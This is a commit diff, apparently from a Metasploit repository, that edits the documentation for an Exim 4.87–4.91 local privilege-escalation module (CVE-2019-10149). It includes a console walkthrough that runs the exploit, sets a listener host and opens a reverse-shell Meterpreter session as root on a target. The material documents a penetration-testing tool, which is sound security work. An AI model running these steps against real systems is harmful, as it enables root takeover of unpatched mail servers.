Land #12889, Add OpenSMTPD MAIL FROM RCE
This commit is contained in:
Alan Foster
@@ -2,7 +2,7 @@
|
||||
|
||||
Exim 4.87 - 4.91 Local Privilege Escalation
|
||||
|
||||
This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).
|
||||
This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).
|
||||
|
||||
Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.
|
||||
|
||||
@@ -37,10 +37,10 @@ The port that exim is listening to. On most cases it will be port 25 (which is t
|
||||
## ForceExploit
|
||||
|
||||
Force exploit even if the current session is root.
|
||||
|
||||
## SendExpectTimeout
|
||||
|
||||
Timeout per send/expect when communicating with exim.
|
||||
## ExpectTimeout
|
||||
|
||||
Timeout for Expect when communicating with exim.
|
||||
|
||||
## WritableDir
|
||||
|
||||
@@ -54,9 +54,9 @@ A directory where we can write files (default is /tmp).
|
||||
```
|
||||
meterpreter > getuid
|
||||
Server username: uid=1000, gid=1000, euid=1000, egid=1000
|
||||
meterpreter >
|
||||
Background session 1? [y/N]
|
||||
msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
|
||||
meterpreter >
|
||||
Background session 1? [y/N]
|
||||
msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
|
||||
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
|
||||
@@ -71,7 +71,7 @@ msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
|
||||
[*] The target appears to be vulnerable.
|
||||
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.0.50:13371
|
||||
[*] Started reverse TCP handler on 192.168.0.50:13371
|
||||
[*] Payload sent, wait a few seconds...
|
||||
[*] Sending stage (985320 bytes) to 192.168.0.80
|
||||
[*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100
|
||||
|
||||
Reference in New Issue
Block a user